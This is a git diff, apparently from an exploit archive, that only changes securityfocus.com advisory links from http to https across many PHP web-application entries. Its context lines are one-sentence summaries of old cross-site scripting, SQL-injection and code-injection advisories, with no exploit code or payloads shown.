--- a/exploits/php/webapps/27384.txt +++ b/exploits/php/webapps/27384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27385.txt b/exploits/php/webapps/27385.txt index 132fb037f..67dfc5a30 100644 --- a/exploits/php/webapps/27385.txt +++ b/exploits/php/webapps/27385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27386.txt b/exploits/php/webapps/27386.txt index 912cd93ee..20c80449b 100644 --- a/exploits/php/webapps/27386.txt +++ b/exploits/php/webapps/27386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27387.txt b/exploits/php/webapps/27387.txt index 3b43ae51d..08912a13a 100644 --- a/exploits/php/webapps/27387.txt +++ b/exploits/php/webapps/27387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27388.txt b/exploits/php/webapps/27388.txt index b7b565e52..72fc732b6 100644 --- a/exploits/php/webapps/27388.txt +++ b/exploits/php/webapps/27388.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27389.txt b/exploits/php/webapps/27389.txt index 199191fe0..2d9ef902e 100644 --- a/exploits/php/webapps/27389.txt +++ b/exploits/php/webapps/27389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17048/info +source: https://www.securityfocus.com/bid/17048/info MyBloggie is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27390.txt b/exploits/php/webapps/27390.txt index ccd93fede..e7c39a248 100644 --- a/exploits/php/webapps/27390.txt +++ b/exploits/php/webapps/27390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27391.txt b/exploits/php/webapps/27391.txt index 73476f532..6836d423f 100644 --- a/exploits/php/webapps/27391.txt +++ b/exploits/php/webapps/27391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27392.txt b/exploits/php/webapps/27392.txt index dd17bc9fa..247bf3f9a 100644 --- a/exploits/php/webapps/27392.txt +++ b/exploits/php/webapps/27392.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27393.txt b/exploits/php/webapps/27393.txt index 59a69a10d..aa718df73 100644 --- a/exploits/php/webapps/27393.txt +++ b/exploits/php/webapps/27393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27394.txt b/exploits/php/webapps/27394.txt index 83c873739..89d4273a8 100644 --- a/exploits/php/webapps/27394.txt +++ b/exploits/php/webapps/27394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27395.txt b/exploits/php/webapps/27395.txt index 8c2feba08..0621536a6 100644 --- a/exploits/php/webapps/27395.txt +++ b/exploits/php/webapps/27395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27396.txt b/exploits/php/webapps/27396.txt index 5c6b0ec1e..4f0caa85a 100644 --- a/exploits/php/webapps/27396.txt +++ b/exploits/php/webapps/27396.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17054/info +source: https://www.securityfocus.com/bid/17054/info txtForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27408.txt b/exploits/php/webapps/27408.txt index 425eac8de..86eddba5e 100644 --- a/exploits/php/webapps/27408.txt +++ b/exploits/php/webapps/27408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17061/info +source: https://www.securityfocus.com/bid/17061/info txtForum is prone to a remote PHP code-injection vulnerability. diff --git a/exploits/php/webapps/27409.txt b/exploits/php/webapps/27409.txt index 2c207f611..fea02c991 100644 --- a/exploits/php/webapps/27409.txt +++ b/exploits/php/webapps/27409.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27410.txt b/exploits/php/webapps/27410.txt index 11465ed87..81163b422 100644 --- a/exploits/php/webapps/27410.txt +++ b/exploits/php/webapps/27410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27411.txt b/exploits/php/webapps/27411.txt index fcdebb3c7..8053b080f 100644 --- a/exploits/php/webapps/27411.txt +++ b/exploits/php/webapps/27411.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27412.txt b/exploits/php/webapps/27412.txt index 0b7f1aaf0..b5bd61a3a 100644 --- a/exploits/php/webapps/27412.txt +++ b/exploits/php/webapps/27412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27413.txt b/exploits/php/webapps/27413.txt index 1f6c2e052..d6ae330af 100644 --- a/exploits/php/webapps/27413.txt +++ b/exploits/php/webapps/27413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17067/info +source: https://www.securityfocus.com/bid/17067/info Core News is prone to a code-execution vulnerability. diff --git a/exploits/php/webapps/27414.txt b/exploits/php/webapps/27414.txt index a047c0b4f..4e5869f8d 100644 --- a/exploits/php/webapps/27414.txt +++ b/exploits/php/webapps/27414.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17073/info +source: https://www.securityfocus.com/bid/17073/info vCard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27415.txt b/exploits/php/webapps/27415.txt index afff5220b..5d0cecfed 100644 --- a/exploits/php/webapps/27415.txt +++ b/exploits/php/webapps/27415.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17076/info +source: https://www.securityfocus.com/bid/17076/info WMNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27416.txt b/exploits/php/webapps/27416.txt index 342c19fb4..ef280fca8 100644 --- a/exploits/php/webapps/27416.txt +++ b/exploits/php/webapps/27416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17076/info +source: https://www.securityfocus.com/bid/17076/info WMNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27417.txt b/exploits/php/webapps/27417.txt index 4074bcf50..03d03d7e5 100644 --- a/exploits/php/webapps/27417.txt +++ b/exploits/php/webapps/27417.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17076/info +source: https://www.securityfocus.com/bid/17076/info WMNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27419.txt b/exploits/php/webapps/27419.txt index 8e9f8d267..c54b7b882 100644 --- a/exploits/php/webapps/27419.txt +++ b/exploits/php/webapps/27419.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17079/info +source: https://www.securityfocus.com/bid/17079/info Vegas Forum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27422.txt b/exploits/php/webapps/27422.txt index 91c600733..e3a6adb3c 100644 --- a/exploits/php/webapps/27422.txt +++ b/exploits/php/webapps/27422.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17107/info +source: https://www.securityfocus.com/bid/17107/info CyBoards PHP Lite is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27423.txt b/exploits/php/webapps/27423.txt index 9def8a5b2..4eb5da169 100644 --- a/exploits/php/webapps/27423.txt +++ b/exploits/php/webapps/27423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17112/info +source: https://www.securityfocus.com/bid/17112/info DSCounter is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27424.txt b/exploits/php/webapps/27424.txt index 9eae1395c..8f322b44b 100644 --- a/exploits/php/webapps/27424.txt +++ b/exploits/php/webapps/27424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17116/info +source: https://www.securityfocus.com/bid/17116/info DSDownload is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27427.txt b/exploits/php/webapps/27427.txt index 3e5a0540d..6f6a64f67 100644 --- a/exploits/php/webapps/27427.txt +++ b/exploits/php/webapps/27427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17128/info +source: https://www.securityfocus.com/bid/17128/info Contrexx CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27434.txt b/exploits/php/webapps/27434.txt index 3f963b04e..6c8a04d3f 100644 --- a/exploits/php/webapps/27434.txt +++ b/exploits/php/webapps/27434.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17132/info +source: https://www.securityfocus.com/bid/17132/info Oxynews is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27435.txt b/exploits/php/webapps/27435.txt index 45d3e0c48..f08710e1b 100644 --- a/exploits/php/webapps/27435.txt +++ b/exploits/php/webapps/27435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17142/info +source: https://www.securityfocus.com/bid/17142/info phpMyAdmin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27436.txt b/exploits/php/webapps/27436.txt index 8eb0faeb6..304ab018b 100644 --- a/exploits/php/webapps/27436.txt +++ b/exploits/php/webapps/27436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27437.txt b/exploits/php/webapps/27437.txt index f2ff123a8..464b0bf05 100644 --- a/exploits/php/webapps/27437.txt +++ b/exploits/php/webapps/27437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27438.txt b/exploits/php/webapps/27438.txt index f517946fd..f5ca4d324 100644 --- a/exploits/php/webapps/27438.txt +++ b/exploits/php/webapps/27438.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27439.txt b/exploits/php/webapps/27439.txt index 1960273c3..85c132f39 100644 --- a/exploits/php/webapps/27439.txt +++ b/exploits/php/webapps/27439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27440.txt b/exploits/php/webapps/27440.txt index 8fe1d34b3..f78260f9f 100644 --- a/exploits/php/webapps/27440.txt +++ b/exploits/php/webapps/27440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27441.txt b/exploits/php/webapps/27441.txt index 5b0406e5a..633ee0025 100644 --- a/exploits/php/webapps/27441.txt +++ b/exploits/php/webapps/27441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27442.txt b/exploits/php/webapps/27442.txt index 6124d0e81..e9a1c7790 100644 --- a/exploits/php/webapps/27442.txt +++ b/exploits/php/webapps/27442.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27443.txt b/exploits/php/webapps/27443.txt index 442d70284..91fb895b2 100644 --- a/exploits/php/webapps/27443.txt +++ b/exploits/php/webapps/27443.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17146/info +source: https://www.securityfocus.com/bid/17146/info ExtCalendar is prone to four cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27444.txt b/exploits/php/webapps/27444.txt index e313462d3..4692f1874 100644 --- a/exploits/php/webapps/27444.txt +++ b/exploits/php/webapps/27444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17147/info +source: https://www.securityfocus.com/bid/17147/info Woltlab Burning Board is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27445.txt b/exploits/php/webapps/27445.txt index 1cf49b742..0786f2740 100644 --- a/exploits/php/webapps/27445.txt +++ b/exploits/php/webapps/27445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17149/info +source: https://www.securityfocus.com/bid/17149/info MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27446.txt b/exploits/php/webapps/27446.txt index a62ded561..c096c17c2 100644 --- a/exploits/php/webapps/27446.txt +++ b/exploits/php/webapps/27446.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17149/info +source: https://www.securityfocus.com/bid/17149/info MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27447.txt b/exploits/php/webapps/27447.txt index 3c188869d..1d25cbefd 100644 --- a/exploits/php/webapps/27447.txt +++ b/exploits/php/webapps/27447.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17149/info +source: https://www.securityfocus.com/bid/17149/info MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27448.txt b/exploits/php/webapps/27448.txt index 67b4ac7b8..b4ef08905 100644 --- a/exploits/php/webapps/27448.txt +++ b/exploits/php/webapps/27448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17150/info +source: https://www.securityfocus.com/bid/17150/info phpWebSite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27449.txt b/exploits/php/webapps/27449.txt index 037bffe21..c8f2a60da 100644 --- a/exploits/php/webapps/27449.txt +++ b/exploits/php/webapps/27449.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17150/info +source: https://www.securityfocus.com/bid/17150/info phpWebSite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. 
diff --git a/exploits/php/webapps/27450.txt b/exploits/php/webapps/27450.txt index 5bfd17040..48e4b9226 100644 --- a/exploits/php/webapps/27450.txt +++ b/exploits/php/webapps/27450.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17153/info +source: https://www.securityfocus.com/bid/17153/info Reportedly, an attacker can carry out directory-traversal attacks. These issues present themselves when the application processes malformed archives. diff --git a/exploits/php/webapps/27454.txt b/exploits/php/webapps/27454.txt index 9ffb7235c..54458ddfc 100644 --- a/exploits/php/webapps/27454.txt +++ b/exploits/php/webapps/27454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17190/info +source: https://www.securityfocus.com/bid/17190/info Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset. diff --git a/exploits/php/webapps/27458.txt b/exploits/php/webapps/27458.txt index a4121d547..826c5129e 100644 --- a/exploits/php/webapps/27458.txt +++ b/exploits/php/webapps/27458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17199/info +source: https://www.securityfocus.com/bid/17199/info EasyMoblog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27459.txt b/exploits/php/webapps/27459.txt index 301966553..e4d2e5ac8 100644 --- a/exploits/php/webapps/27459.txt +++ b/exploits/php/webapps/27459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17201/info +source: https://www.securityfocus.com/bid/17201/info CoMoblog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/27462.txt b/exploits/php/webapps/27462.txt index 702f7bc3d..5c7a556d4 100644 --- a/exploits/php/webapps/27462.txt +++ b/exploits/php/webapps/27462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17208/info +source: https://www.securityfocus.com/bid/17208/info AdMan is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27465.txt b/exploits/php/webapps/27465.txt index 3186060ef..001416975 100644 --- a/exploits/php/webapps/27465.txt +++ b/exploits/php/webapps/27465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17226/info +source: https://www.securityfocus.com/bid/17226/info VihorDesign is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27466.txt b/exploits/php/webapps/27466.txt index 594b5ee87..afa76aab7 100644 --- a/exploits/php/webapps/27466.txt +++ b/exploits/php/webapps/27466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17227/info +source: https://www.securityfocus.com/bid/17227/info VihorDesign is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27467.txt b/exploits/php/webapps/27467.txt index ee07372c1..401a0c7b4 100644 --- a/exploits/php/webapps/27467.txt +++ b/exploits/php/webapps/27467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17231/info +source: https://www.securityfocus.com/bid/17231/info ConfTool is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27468.txt b/exploits/php/webapps/27468.txt index 5e802bdac..5a54d72fb 100644 
--- a/exploits/php/webapps/27468.txt +++ b/exploits/php/webapps/27468.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17233/info +source: https://www.securityfocus.com/bid/17233/info Nuked-Klan is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27475.txt b/exploits/php/webapps/27475.txt index 4f0c843fd..3a533c0d9 100644 --- a/exploits/php/webapps/27475.txt +++ b/exploits/php/webapps/27475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17239/info +source: https://www.securityfocus.com/bid/17239/info SaphpLesson is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27477.txt b/exploits/php/webapps/27477.txt index d4f197578..14c2daaaa 100644 --- a/exploits/php/webapps/27477.txt +++ b/exploits/php/webapps/27477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17247/info +source: https://www.securityfocus.com/bid/17247/info Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27478.txt b/exploits/php/webapps/27478.txt index fbf8fbc9b..237e97cc9 100644 --- a/exploits/php/webapps/27478.txt +++ b/exploits/php/webapps/27478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17247/info +source: https://www.securityfocus.com/bid/17247/info Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27483.txt b/exploits/php/webapps/27483.txt index 34c26e20d..a6513792d 100644 --- a/exploits/php/webapps/27483.txt +++ b/exploits/php/webapps/27483.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17260/info +source: https://www.securityfocus.com/bid/17260/info Pixel Motion is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27484.txt b/exploits/php/webapps/27484.txt index 4f7ea3d85..c98dd0c2e 100644 --- a/exploits/php/webapps/27484.txt +++ b/exploits/php/webapps/27484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17260/info +source: https://www.securityfocus.com/bid/17260/info Pixel Motion is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27485.txt b/exploits/php/webapps/27485.txt index 687058fe6..1ea5b09c6 100644 --- a/exploits/php/webapps/27485.txt +++ b/exploits/php/webapps/27485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17262/info +source: https://www.securityfocus.com/bid/17262/info DSLogin is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27494.txt b/exploits/php/webapps/27494.txt index 7ab528a92..47eecc660 100644 --- a/exploits/php/webapps/27494.txt +++ b/exploits/php/webapps/27494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17278/info +source: https://www.securityfocus.com/bid/17278/info The 'phpmyfamily' application is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27495.txt b/exploits/php/webapps/27495.txt index 5989d787b..28b9ffcc5 100644 --- a/exploits/php/webapps/27495.txt +++ b/exploits/php/webapps/27495.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17279/info +source: https://www.securityfocus.com/bid/17279/info phpCOIN is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27496.txt b/exploits/php/webapps/27496.txt index f4860599b..b18e7b3f9 100644 --- a/exploits/php/webapps/27496.txt +++ b/exploits/php/webapps/27496.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17279/info +source: https://www.securityfocus.com/bid/17279/info phpCOIN is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27497.txt b/exploits/php/webapps/27497.txt index c7aa2b83d..4db37e61d 100644 --- a/exploits/php/webapps/27497.txt +++ b/exploits/php/webapps/27497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17282/info +source: https://www.securityfocus.com/bid/17282/info CONTROLzx HMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27498.txt b/exploits/php/webapps/27498.txt index c2c419222..5dd87d721 100644 --- a/exploits/php/webapps/27498.txt +++ b/exploits/php/webapps/27498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17282/info +source: https://www.securityfocus.com/bid/17282/info CONTROLzx HMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27499.txt b/exploits/php/webapps/27499.txt index a73dea69e..5bf2da959 100644 --- a/exploits/php/webapps/27499.txt +++ b/exploits/php/webapps/27499.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17282/info +source: https://www.securityfocus.com/bid/17282/info CONTROLzx HMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27500.txt b/exploits/php/webapps/27500.txt index a33cfe7a3..6f078267f 100644 --- a/exploits/php/webapps/27500.txt +++ b/exploits/php/webapps/27500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17285/info +source: https://www.securityfocus.com/bid/17285/info ArabPortal System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27501.txt b/exploits/php/webapps/27501.txt index c53def30c..f747b6ed0 100644 --- a/exploits/php/webapps/27501.txt +++ b/exploits/php/webapps/27501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17285/info +source: https://www.securityfocus.com/bid/17285/info ArabPortal System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27502.txt b/exploits/php/webapps/27502.txt index e26ce1244..d4c07c317 100644 --- a/exploits/php/webapps/27502.txt +++ b/exploits/php/webapps/27502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27503.txt b/exploits/php/webapps/27503.txt index 30e2ff746..3d131cfa3 100644 --- a/exploits/php/webapps/27503.txt +++ b/exploits/php/webapps/27503.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27504.txt b/exploits/php/webapps/27504.txt index 6e401e15d..a496904de 100644 --- a/exploits/php/webapps/27504.txt +++ b/exploits/php/webapps/27504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27505.txt b/exploits/php/webapps/27505.txt index 279522aef..6dead789d 100644 --- a/exploits/php/webapps/27505.txt +++ b/exploits/php/webapps/27505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27506.txt b/exploits/php/webapps/27506.txt index 